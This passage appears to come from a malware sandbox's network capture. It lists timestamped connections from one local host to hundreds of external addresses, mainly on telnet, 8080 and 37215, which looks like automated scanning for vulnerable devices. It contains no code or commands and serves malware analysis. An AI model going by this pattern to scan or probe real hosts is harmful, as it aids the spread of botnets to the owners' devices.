                                              Nov 23, 2023 05:14:51.043575048 CET478168080192.168.2.1495.147.160.51
                                              Nov 23, 2023 05:14:51.043581009 CET478168080192.168.2.1431.58.224.124
                                              Nov 23, 2023 05:14:51.043591976 CET478168080192.168.2.1494.62.178.145
                                              Nov 23, 2023 05:14:51.043591976 CET478168080192.168.2.1495.127.240.133
                                              Nov 23, 2023 05:14:51.043596983 CET478168080192.168.2.1462.49.79.226
                                              Nov 23, 2023 05:14:51.043601036 CET478168080192.168.2.1485.154.190.199
                                              Nov 23, 2023 05:14:51.043613911 CET478168080192.168.2.1431.73.108.207
                                              Nov 23, 2023 05:14:51.043616056 CET478168080192.168.2.1462.54.109.158
                                              Nov 23, 2023 05:14:51.043625116 CET478168080192.168.2.1462.248.232.203
                                              Nov 23, 2023 05:14:51.043631077 CET478168080192.168.2.1431.187.96.4
                                              Nov 23, 2023 05:14:51.043636084 CET478168080192.168.2.1485.107.195.243
                                              Nov 23, 2023 05:14:51.043641090 CET478168080192.168.2.1462.239.99.78
                                              Nov 23, 2023 05:14:51.043653011 CET478168080192.168.2.1485.128.111.77
                                              Nov 23, 2023 05:14:51.043656111 CET478168080192.168.2.1462.55.119.44
                                              Nov 23, 2023 05:14:51.043657064 CET478168080192.168.2.1495.215.149.247
                                              Nov 23, 2023 05:14:51.043659925 CET478168080192.168.2.1485.138.121.120
                                              Nov 23, 2023 05:14:51.043663025 CET478168080192.168.2.1462.131.27.67
                                              Nov 23, 2023 05:14:51.043667078 CET478168080192.168.2.1462.73.180.56
                                              Nov 23, 2023 05:14:51.043668985 CET478168080192.168.2.1462.32.100.133
                                              Nov 23, 2023 05:14:51.043672085 CET478168080192.168.2.1494.164.134.194
                                              Nov 23, 2023 05:14:51.043678045 CET478168080192.168.2.1431.95.127.184
                                              Nov 23, 2023 05:14:51.043684006 CET478168080192.168.2.1462.203.196.10
                                              Nov 23, 2023 05:14:51.043687105 CET478168080192.168.2.1431.228.223.157
                                              Nov 23, 2023 05:14:51.043694019 CET478168080192.168.2.1494.23.173.153
                                              Nov 23, 2023 05:14:51.043703079 CET478168080192.168.2.1431.192.177.60
                                              Nov 23, 2023 05:14:51.043705940 CET478168080192.168.2.1495.127.194.171
                                              Nov 23, 2023 05:14:51.043705940 CET478168080192.168.2.1494.24.143.182
                                              Nov 23, 2023 05:14:51.043714046 CET478168080192.168.2.1494.182.20.2
                                              Nov 23, 2023 05:14:51.043720961 CET478168080192.168.2.1462.99.132.181
                                              Nov 23, 2023 05:14:51.043731928 CET478168080192.168.2.1494.196.166.220
                                              Nov 23, 2023 05:14:51.043735981 CET478168080192.168.2.1495.124.208.4
                                              Nov 23, 2023 05:14:51.043737888 CET478168080192.168.2.1462.150.2.187
                                              Nov 23, 2023 05:14:51.043746948 CET478168080192.168.2.1431.214.96.124
                                              Nov 23, 2023 05:14:51.043750048 CET478168080192.168.2.1462.1.62.150
                                              Nov 23, 2023 05:14:51.043754101 CET478168080192.168.2.1485.161.19.95
                                              Nov 23, 2023 05:14:51.043771982 CET478168080192.168.2.1494.132.165.131
                                              Nov 23, 2023 05:14:51.043772936 CET478168080192.168.2.1431.207.247.151
                                              Nov 23, 2023 05:14:51.043781042 CET478168080192.168.2.1495.92.119.146
                                              Nov 23, 2023 05:14:51.043787956 CET478168080192.168.2.1485.121.152.27
                                              Nov 23, 2023 05:14:51.043796062 CET478168080192.168.2.1495.98.13.199
                                              Nov 23, 2023 05:14:51.043801069 CET478168080192.168.2.1494.19.40.176
                                              Nov 23, 2023 05:14:51.043802023 CET478168080192.168.2.1462.229.221.172
                                              Nov 23, 2023 05:14:51.043806076 CET478168080192.168.2.1494.189.73.173
                                              Nov 23, 2023 05:14:51.043807983 CET478168080192.168.2.1431.38.216.134
                                              Nov 23, 2023 05:14:51.043807983 CET478168080192.168.2.1495.89.0.131
                                              Nov 23, 2023 05:14:51.043819904 CET478168080192.168.2.1431.188.250.103
                                              Nov 23, 2023 05:14:51.043821096 CET478168080192.168.2.1431.242.94.237
                                              Nov 23, 2023 05:14:51.043822050 CET478168080192.168.2.1494.33.45.23
                                              Nov 23, 2023 05:14:51.043827057 CET478168080192.168.2.1485.212.121.91
                                              Nov 23, 2023 05:14:51.043838024 CET478168080192.168.2.1495.191.52.200
                                              Nov 23, 2023 05:14:51.043850899 CET478168080192.168.2.1494.226.61.85
                                              Nov 23, 2023 05:14:51.043860912 CET478168080192.168.2.1495.74.87.252
                                              Nov 23, 2023 05:14:51.043863058 CET478168080192.168.2.1485.136.75.67
                                              Nov 23, 2023 05:14:51.043864012 CET478168080192.168.2.1462.127.192.18
                                              Nov 23, 2023 05:14:51.043869972 CET478168080192.168.2.1495.201.248.34
                                              Nov 23, 2023 05:14:51.043876886 CET478168080192.168.2.1485.113.112.108
                                              Nov 23, 2023 05:14:51.043883085 CET478168080192.168.2.1494.109.198.146
                                              Nov 23, 2023 05:14:51.043894053 CET478168080192.168.2.1495.156.0.235
                                              Nov 23, 2023 05:14:51.043895006 CET478168080192.168.2.1494.182.209.42
                                              Nov 23, 2023 05:14:51.043895960 CET478168080192.168.2.1462.158.112.23
                                              Nov 23, 2023 05:14:51.043895960 CET478168080192.168.2.1494.128.90.108
                                              Nov 23, 2023 05:14:51.043908119 CET478168080192.168.2.1462.221.163.234
                                              Nov 23, 2023 05:14:51.043914080 CET478168080192.168.2.1485.88.112.211
                                              Nov 23, 2023 05:14:51.043915033 CET478168080192.168.2.1485.166.202.111
                                              Nov 23, 2023 05:14:51.043922901 CET478168080192.168.2.1431.151.121.245
                                              Nov 23, 2023 05:14:51.043929100 CET478168080192.168.2.1494.158.250.140
                                              Nov 23, 2023 05:14:51.043935061 CET478168080192.168.2.1494.4.163.128
                                              Nov 23, 2023 05:14:51.043940067 CET478168080192.168.2.1431.21.33.127
                                              Nov 23, 2023 05:14:51.043952942 CET478168080192.168.2.1495.91.73.38
                                              Nov 23, 2023 05:14:51.043953896 CET478168080192.168.2.1485.166.138.128
                                              Nov 23, 2023 05:14:51.043958902 CET478168080192.168.2.1431.129.51.243
                                              Nov 23, 2023 05:14:51.043972969 CET478168080192.168.2.1462.244.200.210
                                              Nov 23, 2023 05:14:51.043972969 CET478168080192.168.2.1485.113.69.212
                                              Nov 23, 2023 05:14:51.043979883 CET478168080192.168.2.1495.162.112.243
                                              Nov 23, 2023 05:14:51.043979883 CET478168080192.168.2.1485.103.35.211
                                              Nov 23, 2023 05:14:51.043988943 CET478168080192.168.2.1495.41.96.191
                                              Nov 23, 2023 05:14:51.044003010 CET478168080192.168.2.1494.247.30.31
                                              Nov 23, 2023 05:14:51.044008017 CET478168080192.168.2.1495.70.138.93
                                              Nov 23, 2023 05:14:51.044014931 CET478168080192.168.2.1495.167.182.241
                                              Nov 23, 2023 05:14:51.044022083 CET478168080192.168.2.1431.64.198.239
                                              Nov 23, 2023 05:14:51.044028044 CET478168080192.168.2.1462.50.207.91
                                              Nov 23, 2023 05:14:51.044028044 CET478168080192.168.2.1494.142.83.210
                                              Nov 23, 2023 05:14:51.044039011 CET478168080192.168.2.1462.51.94.246
                                              Nov 23, 2023 05:14:51.044042110 CET478168080192.168.2.1431.226.185.198
                                              Nov 23, 2023 05:14:51.044058084 CET478168080192.168.2.1462.108.154.44
                                              Nov 23, 2023 05:14:51.044058084 CET478168080192.168.2.1431.234.176.25
                                              Nov 23, 2023 05:14:51.044061899 CET478168080192.168.2.1495.248.182.243
                                              Nov 23, 2023 05:14:51.044068098 CET478168080192.168.2.1431.130.36.81
                                              Nov 23, 2023 05:14:51.044076920 CET478168080192.168.2.1431.166.178.181
                                              Nov 23, 2023 05:14:51.044080019 CET478168080192.168.2.1485.15.229.116
                                              Nov 23, 2023 05:14:51.044091940 CET478168080192.168.2.1494.20.5.235
                                              Nov 23, 2023 05:14:51.044104099 CET478168080192.168.2.1485.199.9.182
                                              Nov 23, 2023 05:14:51.044106007 CET478168080192.168.2.1462.34.116.157
                                              Nov 23, 2023 05:14:51.044111967 CET478168080192.168.2.1485.154.223.228
                                              Nov 23, 2023 05:14:51.044115067 CET478168080192.168.2.1485.50.89.25
                                              Nov 23, 2023 05:14:51.044122934 CET478168080192.168.2.1494.152.141.175
                                              Nov 23, 2023 05:14:51.044126034 CET478168080192.168.2.1485.151.255.69
                                              Nov 23, 2023 05:14:51.044128895 CET478168080192.168.2.1462.107.215.214
                                              Nov 23, 2023 05:14:51.044142008 CET478168080192.168.2.1431.38.255.8
                                              Nov 23, 2023 05:14:51.044143915 CET478168080192.168.2.1485.96.37.51
                                              Nov 23, 2023 05:14:51.044158936 CET478168080192.168.2.1494.229.216.251
                                              Nov 23, 2023 05:14:51.044162035 CET478168080192.168.2.1494.180.66.87
                                              Nov 23, 2023 05:14:51.044162989 CET478168080192.168.2.1494.102.17.33
                                              Nov 23, 2023 05:14:51.044173002 CET478168080192.168.2.1462.64.15.185
                                              Nov 23, 2023 05:14:51.044178009 CET478168080192.168.2.1462.99.57.251
                                              Nov 23, 2023 05:14:51.044186115 CET478168080192.168.2.1462.112.195.172
                                              Nov 23, 2023 05:14:51.044187069 CET478168080192.168.2.1494.113.210.105
                                              Nov 23, 2023 05:14:51.044200897 CET478168080192.168.2.1485.199.170.239
                                              Nov 23, 2023 05:14:51.044204950 CET478168080192.168.2.1462.23.139.71
                                              Nov 23, 2023 05:14:51.044213057 CET478168080192.168.2.1494.203.234.79
                                              Nov 23, 2023 05:14:51.044225931 CET478168080192.168.2.1431.250.71.127
                                              Nov 23, 2023 05:14:51.044233084 CET478168080192.168.2.1495.249.210.83
                                              Nov 23, 2023 05:14:51.044238091 CET478168080192.168.2.1485.24.83.54
                                              Nov 23, 2023 05:14:51.044238091 CET478168080192.168.2.1494.148.114.197
                                              Nov 23, 2023 05:14:51.044246912 CET478168080192.168.2.1431.248.8.79
                                              Nov 23, 2023 05:14:51.044250965 CET478168080192.168.2.1494.221.127.32
                                              Nov 23, 2023 05:14:51.044254065 CET478168080192.168.2.1462.105.142.78
                                              Nov 23, 2023 05:14:51.044259071 CET478168080192.168.2.1431.251.177.29
                                              Nov 23, 2023 05:14:51.044274092 CET478168080192.168.2.1431.15.174.12
                                              Nov 23, 2023 05:14:51.044277906 CET478168080192.168.2.1494.51.84.188
                                              Nov 23, 2023 05:14:51.044282913 CET478168080192.168.2.1431.219.40.231
                                              Nov 23, 2023 05:14:51.044282913 CET478168080192.168.2.1485.134.216.216
                                              Nov 23, 2023 05:14:51.044282913 CET478168080192.168.2.1494.82.139.252
                                              Nov 23, 2023 05:14:51.044285059 CET478168080192.168.2.1495.229.245.219
                                              Nov 23, 2023 05:14:51.044297934 CET478168080192.168.2.1495.94.24.15
                                              Nov 23, 2023 05:14:51.044300079 CET478168080192.168.2.1462.142.187.166
                                              Nov 23, 2023 05:14:51.044316053 CET478168080192.168.2.1485.194.84.121
                                              Nov 23, 2023 05:14:51.044316053 CET478168080192.168.2.1495.74.213.98
                                              Nov 23, 2023 05:14:51.044326067 CET478168080192.168.2.1431.115.63.177
                                              Nov 23, 2023 05:14:51.044332981 CET478168080192.168.2.1462.91.28.1
                                              Nov 23, 2023 05:14:51.044344902 CET478168080192.168.2.1495.215.254.132
                                              Nov 23, 2023 05:14:51.044344902 CET478168080192.168.2.1485.154.175.25
                                              Nov 23, 2023 05:14:51.044354916 CET478168080192.168.2.1462.145.51.198
                                              Nov 23, 2023 05:14:51.044357061 CET478168080192.168.2.1495.117.11.29
                                              Nov 23, 2023 05:14:51.044357061 CET478168080192.168.2.1431.24.152.197
                                              Nov 23, 2023 05:14:51.044358969 CET478168080192.168.2.1431.109.112.55
                                              Nov 23, 2023 05:14:51.044363022 CET478168080192.168.2.1485.205.23.164
                                              Nov 23, 2023 05:14:51.044368982 CET478168080192.168.2.1495.98.97.123
                                              Nov 23, 2023 05:14:51.044369936 CET478168080192.168.2.1494.147.53.97
                                              Nov 23, 2023 05:14:51.044373035 CET478168080192.168.2.1485.11.0.138
                                              Nov 23, 2023 05:14:51.044377089 CET478168080192.168.2.1494.14.185.148
                                              Nov 23, 2023 05:14:51.044379950 CET478168080192.168.2.1431.110.64.161
                                              Nov 23, 2023 05:14:51.044388056 CET478168080192.168.2.1494.215.114.15
                                              Nov 23, 2023 05:14:51.044390917 CET478168080192.168.2.1431.132.6.238
                                              Nov 23, 2023 05:14:51.044403076 CET478168080192.168.2.1431.255.31.254
                                              Nov 23, 2023 05:14:51.044404984 CET478168080192.168.2.1462.70.208.231
                                              Nov 23, 2023 05:14:51.044418097 CET478168080192.168.2.1494.145.202.239
                                              Nov 23, 2023 05:14:51.044419050 CET478168080192.168.2.1495.50.93.18
                                              Nov 23, 2023 05:14:51.044419050 CET478168080192.168.2.1462.161.188.239
                                              Nov 23, 2023 05:14:51.044430971 CET478168080192.168.2.1431.143.232.109
                                              Nov 23, 2023 05:14:51.044435024 CET478168080192.168.2.1462.177.209.21
                                              Nov 23, 2023 05:14:51.044440985 CET478168080192.168.2.1494.157.31.236
                                              Nov 23, 2023 05:14:51.044446945 CET478168080192.168.2.1495.255.118.110
                                              Nov 23, 2023 05:14:51.044450998 CET478168080192.168.2.1495.112.202.237
                                              Nov 23, 2023 05:14:51.044465065 CET478168080192.168.2.1494.80.3.46
                                              Nov 23, 2023 05:14:51.044466972 CET478168080192.168.2.1462.68.211.116
                                              Nov 23, 2023 05:14:51.044486046 CET478168080192.168.2.1485.151.94.39
                                              Nov 23, 2023 05:14:51.044488907 CET478168080192.168.2.1495.92.13.153
                                              Nov 23, 2023 05:14:51.044490099 CET478168080192.168.2.1431.234.167.186
                                              Nov 23, 2023 05:14:51.044495106 CET478168080192.168.2.1485.253.236.34
                                              Nov 23, 2023 05:14:51.044497013 CET478168080192.168.2.1431.208.188.40
                                              Nov 23, 2023 05:14:51.044497967 CET478168080192.168.2.1431.144.228.38
                                              Nov 23, 2023 05:14:51.044497013 CET478168080192.168.2.1431.59.69.177
                                              Nov 23, 2023 05:14:51.044497967 CET478168080192.168.2.1431.37.106.231
                                              Nov 23, 2023 05:14:51.044508934 CET478168080192.168.2.1495.3.96.19
                                              Nov 23, 2023 05:14:51.044511080 CET478168080192.168.2.1431.85.114.39
                                              Nov 23, 2023 05:14:51.044523001 CET478168080192.168.2.1462.224.27.13
                                              Nov 23, 2023 05:14:51.044527054 CET478168080192.168.2.1431.126.121.148
                                              Nov 23, 2023 05:14:51.044533968 CET478168080192.168.2.1462.88.95.108
                                              Nov 23, 2023 05:14:51.044533968 CET478168080192.168.2.1462.175.7.248
                                              Nov 23, 2023 05:14:51.044548035 CET478168080192.168.2.1494.127.177.24
                                              Nov 23, 2023 05:14:51.044558048 CET478168080192.168.2.1495.14.196.113
                                              Nov 23, 2023 05:14:51.044562101 CET478168080192.168.2.1485.38.97.155
                                              Nov 23, 2023 05:14:51.044562101 CET478168080192.168.2.1431.47.26.68
                                              Nov 23, 2023 05:14:51.044574976 CET478168080192.168.2.1495.20.22.53
                                              Nov 23, 2023 05:14:51.044575930 CET478168080192.168.2.1495.117.161.165
                                              Nov 23, 2023 05:14:51.044580936 CET478168080192.168.2.1494.251.222.84
                                              Nov 23, 2023 05:14:51.044590950 CET478168080192.168.2.1494.6.21.239
                                              Nov 23, 2023 05:14:51.044600010 CET478168080192.168.2.1485.204.50.252
                                              Nov 23, 2023 05:14:51.044604063 CET478168080192.168.2.1485.227.244.235
                                              Nov 23, 2023 05:14:51.044606924 CET478168080192.168.2.1495.174.159.25
                                              Nov 23, 2023 05:14:51.044609070 CET478168080192.168.2.1495.126.72.82
                                              Nov 23, 2023 05:14:51.044624090 CET478168080192.168.2.1485.181.127.248
                                              Nov 23, 2023 05:14:51.044629097 CET478168080192.168.2.1462.174.172.190
                                              Nov 23, 2023 05:14:51.044630051 CET478168080192.168.2.1431.55.35.157
                                              Nov 23, 2023 05:14:51.044632912 CET478168080192.168.2.1485.78.177.118
                                              Nov 23, 2023 05:14:51.044632912 CET478168080192.168.2.1494.158.229.136
                                              Nov 23, 2023 05:14:51.044645071 CET478168080192.168.2.1495.171.80.250
                                              Nov 23, 2023 05:14:51.044647932 CET478168080192.168.2.1494.133.241.21
                                              Nov 23, 2023 05:14:51.044651031 CET478168080192.168.2.1431.78.224.21
                                              Nov 23, 2023 05:14:51.044662952 CET478168080192.168.2.1485.80.22.250
                                              Nov 23, 2023 05:14:51.044665098 CET478168080192.168.2.1462.7.212.19
                                              Nov 23, 2023 05:14:51.044665098 CET478168080192.168.2.1494.120.8.60
                                              Nov 23, 2023 05:14:51.044673920 CET478168080192.168.2.1462.115.18.104
                                              Nov 23, 2023 05:14:51.044677973 CET478168080192.168.2.1462.56.150.69
                                              Nov 23, 2023 05:14:51.044692039 CET478168080192.168.2.1494.16.52.188
                                              Nov 23, 2023 05:14:51.044694901 CET478168080192.168.2.1494.107.248.90
                                              Nov 23, 2023 05:14:51.044704914 CET478168080192.168.2.1485.250.155.217
                                              Nov 23, 2023 05:14:51.044706106 CET478168080192.168.2.1494.98.39.21
                                              Nov 23, 2023 05:14:51.044708014 CET478168080192.168.2.1462.127.146.76
                                              Nov 23, 2023 05:14:51.044712067 CET478168080192.168.2.1462.95.10.23
                                              Nov 23, 2023 05:14:51.044715881 CET478168080192.168.2.1431.87.169.90
                                              Nov 23, 2023 05:14:51.044734955 CET478168080192.168.2.1431.191.198.155
                                              Nov 23, 2023 05:14:51.044739962 CET478168080192.168.2.1462.75.102.165
                                              Nov 23, 2023 05:14:51.044739962 CET478168080192.168.2.1431.206.106.239
                                              Nov 23, 2023 05:14:51.044743061 CET478168080192.168.2.1431.172.168.145
                                              Nov 23, 2023 05:14:51.044754982 CET478168080192.168.2.1494.226.169.146
                                              Nov 23, 2023 05:14:51.044759989 CET478168080192.168.2.1462.186.157.103
                                              Nov 23, 2023 05:14:51.044759989 CET478168080192.168.2.1495.187.7.145
                                              Nov 23, 2023 05:14:51.044764996 CET478168080192.168.2.1431.116.2.232
                                              Nov 23, 2023 05:14:51.044781923 CET478168080192.168.2.1485.23.167.133
                                              Nov 23, 2023 05:14:51.044783115 CET478168080192.168.2.1431.3.86.22
                                              Nov 23, 2023 05:14:51.044783115 CET478168080192.168.2.1494.211.150.100
                                              Nov 23, 2023 05:14:51.044794083 CET478168080192.168.2.1494.41.24.230
                                              Nov 23, 2023 05:14:51.044795036 CET478168080192.168.2.1494.136.228.124
                                              Nov 23, 2023 05:14:51.044795036 CET478168080192.168.2.1431.245.161.184
                                              Nov 23, 2023 05:14:51.044795990 CET478168080192.168.2.1495.121.62.35
                                              Nov 23, 2023 05:14:51.044800043 CET478168080192.168.2.1494.188.22.161
                                              Nov 23, 2023 05:14:51.044811010 CET478168080192.168.2.1485.75.5.216
                                              Nov 23, 2023 05:14:51.044816971 CET478168080192.168.2.1462.81.130.224
                                              Nov 23, 2023 05:14:51.044825077 CET478168080192.168.2.1494.48.214.81
                                              Nov 23, 2023 05:14:51.044836998 CET478168080192.168.2.1494.189.151.79
                                              Nov 23, 2023 05:14:51.044837952 CET478168080192.168.2.1485.212.230.98
                                              Nov 23, 2023 05:14:51.044841051 CET478168080192.168.2.1495.179.26.177
                                              Nov 23, 2023 05:14:51.044842958 CET478168080192.168.2.1494.58.12.200
                                              Nov 23, 2023 05:14:51.044853926 CET478168080192.168.2.1431.204.166.146
                                              Nov 23, 2023 05:14:51.044858932 CET478168080192.168.2.1431.175.174.213
                                              Nov 23, 2023 05:14:51.044871092 CET478168080192.168.2.1431.128.106.51
                                              Nov 23, 2023 05:14:51.044872046 CET478168080192.168.2.1495.245.16.74
                                              Nov 23, 2023 05:14:51.044872999 CET478168080192.168.2.1431.23.178.229
                                              Nov 23, 2023 05:14:51.044888973 CET478168080192.168.2.1495.3.164.255
                                              Nov 23, 2023 05:14:51.044892073 CET478168080192.168.2.1485.12.249.78
                                              Nov 23, 2023 05:14:51.044899940 CET478168080192.168.2.1462.252.6.13
                                              Nov 23, 2023 05:14:51.044910908 CET478168080192.168.2.1494.193.63.188
                                              Nov 23, 2023 05:14:51.044914007 CET478168080192.168.2.1495.216.112.43
                                              Nov 23, 2023 05:14:51.044920921 CET478168080192.168.2.1431.255.180.243
                                              Nov 23, 2023 05:14:51.044926882 CET478168080192.168.2.1462.228.255.2
                                              Nov 23, 2023 05:14:51.044987917 CET327728080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:51.045011044 CET539768080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:51.049587011 CET452608080192.168.2.1494.64.14.98
                                              Nov 23, 2023 05:14:51.049587011 CET547748080192.168.2.1494.120.12.111
                                              Nov 23, 2023 05:14:51.049635887 CET575308080192.168.2.1431.136.28.87
                                              Nov 23, 2023 05:14:51.049642086 CET384308080192.168.2.1494.240.114.86
                                              Nov 23, 2023 05:14:51.049643040 CET475168080192.168.2.1494.121.186.157
                                              Nov 23, 2023 05:14:51.049731970 CET366248080192.168.2.1494.122.6.45
                                              Nov 23, 2023 05:14:51.049731970 CET488048080192.168.2.1494.122.104.168
                                              Nov 23, 2023 05:14:51.145292997 CET80804781685.153.72.192192.168.2.14
                                              Nov 23, 2023 05:14:51.183695078 CET2347828208.181.187.238192.168.2.14
                                              Nov 23, 2023 05:14:51.191217899 CET23478285.2.77.165192.168.2.14
                                              Nov 23, 2023 05:14:51.213848114 CET2347828208.205.55.13192.168.2.14
                                              Nov 23, 2023 05:14:51.231158972 CET80804781694.186.233.233192.168.2.14
                                              Nov 23, 2023 05:14:51.237732887 CET80804781694.26.236.55192.168.2.14
                                              Nov 23, 2023 05:14:51.238250017 CET80804781662.56.202.60192.168.2.14
                                              Nov 23, 2023 05:14:51.243660927 CET80804781695.60.9.169192.168.2.14
                                              Nov 23, 2023 05:14:51.245831013 CET80804781694.225.210.209192.168.2.14
                                              Nov 23, 2023 05:14:51.251373053 CET80804781685.44.184.133192.168.2.14
                                              Nov 23, 2023 05:14:51.251431942 CET80804781662.163.178.247192.168.2.14
                                              Nov 23, 2023 05:14:51.251498938 CET478168080192.168.2.1462.163.178.247
                                              Nov 23, 2023 05:14:51.253468037 CET80804781631.187.104.102192.168.2.14
                                              Nov 23, 2023 05:14:51.254520893 CET80804781695.64.226.17192.168.2.14
                                              Nov 23, 2023 05:14:51.255283117 CET234782895.9.134.44192.168.2.14
                                              Nov 23, 2023 05:14:51.255345106 CET4782823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:51.255464077 CET80804781685.235.188.109192.168.2.14
                                              Nov 23, 2023 05:14:51.257781029 CET80804781685.128.111.77192.168.2.14
                                              Nov 23, 2023 05:14:51.259547949 CET80804781631.195.6.78192.168.2.14
                                              Nov 23, 2023 05:14:51.271569967 CET80804781631.187.96.4192.168.2.14
                                              Nov 23, 2023 05:14:51.272926092 CET80804781685.23.227.71192.168.2.14
                                              Nov 23, 2023 05:14:51.272973061 CET478168080192.168.2.1485.23.227.71
                                              Nov 23, 2023 05:14:51.273020029 CET234782860.101.219.171192.168.2.14
                                              Nov 23, 2023 05:14:51.274293900 CET234562495.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:51.274390936 CET4562423192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:51.274610996 CET5100823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:51.284965992 CET80804781685.97.184.4192.168.2.14
                                              Nov 23, 2023 05:14:51.285495996 CET372155955441.78.156.233192.168.2.14
                                              Nov 23, 2023 05:14:51.285584927 CET5955437215192.168.2.1441.78.156.233
                                              Nov 23, 2023 05:14:51.285895109 CET5956637215192.168.2.1441.78.156.233
                                              Nov 23, 2023 05:14:51.296236992 CET2347828118.61.127.104192.168.2.14
                                              Nov 23, 2023 05:14:51.297297001 CET2347828222.10.157.27192.168.2.14
                                              Nov 23, 2023 05:14:51.301816940 CET80804781695.142.133.119192.168.2.14
                                              Nov 23, 2023 05:14:51.302598000 CET2347828211.248.177.138192.168.2.14
                                              Nov 23, 2023 05:14:51.302689075 CET234782861.82.57.84192.168.2.14
                                              Nov 23, 2023 05:14:51.318979979 CET3721547830197.159.29.138192.168.2.14
                                              Nov 23, 2023 05:14:51.326685905 CET3721542390156.226.15.209192.168.2.14
                                              Nov 23, 2023 05:14:51.326752901 CET4239037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:51.326800108 CET4239037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:51.326800108 CET4239037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:51.326833963 CET4240037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:51.327228069 CET3721535652156.254.88.148192.168.2.14
                                              Nov 23, 2023 05:14:51.327296972 CET3565237215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:51.327317953 CET3565237215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:51.327317953 CET3565237215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:51.327326059 CET3566637215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:51.328502893 CET80804781685.90.113.93192.168.2.14
                                              Nov 23, 2023 05:14:51.329935074 CET372154783041.190.113.24192.168.2.14
                                              Nov 23, 2023 05:14:51.365720034 CET372154783041.23.116.201192.168.2.14
                                              Nov 23, 2023 05:14:51.524028063 CET235100895.9.134.44192.168.2.14
                                              Nov 23, 2023 05:14:51.524127007 CET5100823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:51.524173021 CET4782823192.168.2.14195.5.248.234
                                              Nov 23, 2023 05:14:51.524188995 CET4782823192.168.2.14244.196.136.156
                                              Nov 23, 2023 05:14:51.524192095 CET4782823192.168.2.1418.153.147.90
                                              Nov 23, 2023 05:14:51.524202108 CET4782823192.168.2.1495.29.222.126
                                              Nov 23, 2023 05:14:51.524203062 CET4782823192.168.2.14189.26.221.230
                                              Nov 23, 2023 05:14:51.524230957 CET4782823192.168.2.14240.226.156.195
                                              Nov 23, 2023 05:14:51.524233103 CET4782823192.168.2.14217.196.243.195
                                              Nov 23, 2023 05:14:51.524233103 CET4782823192.168.2.1457.129.78.249
                                              Nov 23, 2023 05:14:51.524233103 CET4782823192.168.2.14176.210.202.60
                                              Nov 23, 2023 05:14:51.524233103 CET4782823192.168.2.14195.253.244.155
                                              Nov 23, 2023 05:14:51.524241924 CET4782823192.168.2.1462.22.102.216
                                              Nov 23, 2023 05:14:51.524245024 CET4782823192.168.2.14202.195.228.250
                                              Nov 23, 2023 05:14:51.524266958 CET4782823192.168.2.14119.91.77.211
                                              Nov 23, 2023 05:14:51.524266958 CET4782823192.168.2.1490.34.196.28
                                              Nov 23, 2023 05:14:51.524266958 CET4782823192.168.2.14213.52.133.137
                                              Nov 23, 2023 05:14:51.524270058 CET4782823192.168.2.1468.153.32.251
                                              Nov 23, 2023 05:14:51.524270058 CET4782823192.168.2.14186.89.186.214
                                              Nov 23, 2023 05:14:51.524270058 CET4782823192.168.2.1491.196.0.219
                                              Nov 23, 2023 05:14:51.524286985 CET4782823192.168.2.1495.81.187.37
                                              Nov 23, 2023 05:14:51.524290085 CET4782823192.168.2.1478.251.181.170
                                              Nov 23, 2023 05:14:51.524290085 CET4782823192.168.2.14161.129.65.3
                                              Nov 23, 2023 05:14:51.524290085 CET4782823192.168.2.1437.252.112.122
                                              Nov 23, 2023 05:14:51.524290085 CET4782823192.168.2.14141.233.93.14
                                              Nov 23, 2023 05:14:51.524290085 CET4782823192.168.2.14221.25.55.61
                                              Nov 23, 2023 05:14:51.524293900 CET4782823192.168.2.1472.9.125.190
                                              Nov 23, 2023 05:14:51.524295092 CET4782823192.168.2.1453.87.205.137
                                              Nov 23, 2023 05:14:51.524297953 CET4782823192.168.2.14141.55.85.161
                                              Nov 23, 2023 05:14:51.524298906 CET4782823192.168.2.14223.102.98.136
                                              Nov 23, 2023 05:14:51.524333954 CET4782823192.168.2.14223.16.32.220
                                              Nov 23, 2023 05:14:51.524333954 CET4782823192.168.2.1482.73.217.117
                                              Nov 23, 2023 05:14:51.524334908 CET4782823192.168.2.1427.138.242.7
                                              Nov 23, 2023 05:14:51.524334908 CET4782823192.168.2.1423.252.52.243
                                              Nov 23, 2023 05:14:51.524336100 CET4782823192.168.2.14164.183.92.75
                                              Nov 23, 2023 05:14:51.524336100 CET4782823192.168.2.14109.66.44.66
                                              Nov 23, 2023 05:14:51.524336100 CET4782823192.168.2.1480.75.161.94
                                              Nov 23, 2023 05:14:51.524337053 CET4782823192.168.2.1499.226.217.244
                                              Nov 23, 2023 05:14:51.524338007 CET4782823192.168.2.1447.86.215.255
                                              Nov 23, 2023 05:14:51.524338961 CET4782823192.168.2.14108.48.62.238
                                              Nov 23, 2023 05:14:51.524338007 CET4782823192.168.2.14172.12.37.78
                                              Nov 23, 2023 05:14:51.524338961 CET4782823192.168.2.1441.211.94.186
                                              Nov 23, 2023 05:14:51.524338007 CET4782823192.168.2.1499.44.145.74
                                              Nov 23, 2023 05:14:51.524338961 CET4782823192.168.2.14121.158.120.209
                                              Nov 23, 2023 05:14:51.524338961 CET4782823192.168.2.1413.61.159.237
                                              Nov 23, 2023 05:14:51.524378061 CET4782823192.168.2.1444.242.45.120
                                              Nov 23, 2023 05:14:51.524395943 CET4782823192.168.2.141.175.244.199
                                              Nov 23, 2023 05:14:51.524395943 CET4782823192.168.2.1466.9.192.16
                                              Nov 23, 2023 05:14:51.524395943 CET4782823192.168.2.1468.9.23.75
                                              Nov 23, 2023 05:14:51.524403095 CET4782823192.168.2.14116.171.232.26
                                              Nov 23, 2023 05:14:51.524403095 CET4782823192.168.2.14163.193.212.252
                                              Nov 23, 2023 05:14:51.524403095 CET4782823192.168.2.1419.232.200.18
                                              Nov 23, 2023 05:14:51.524403095 CET4782823192.168.2.1436.169.167.58
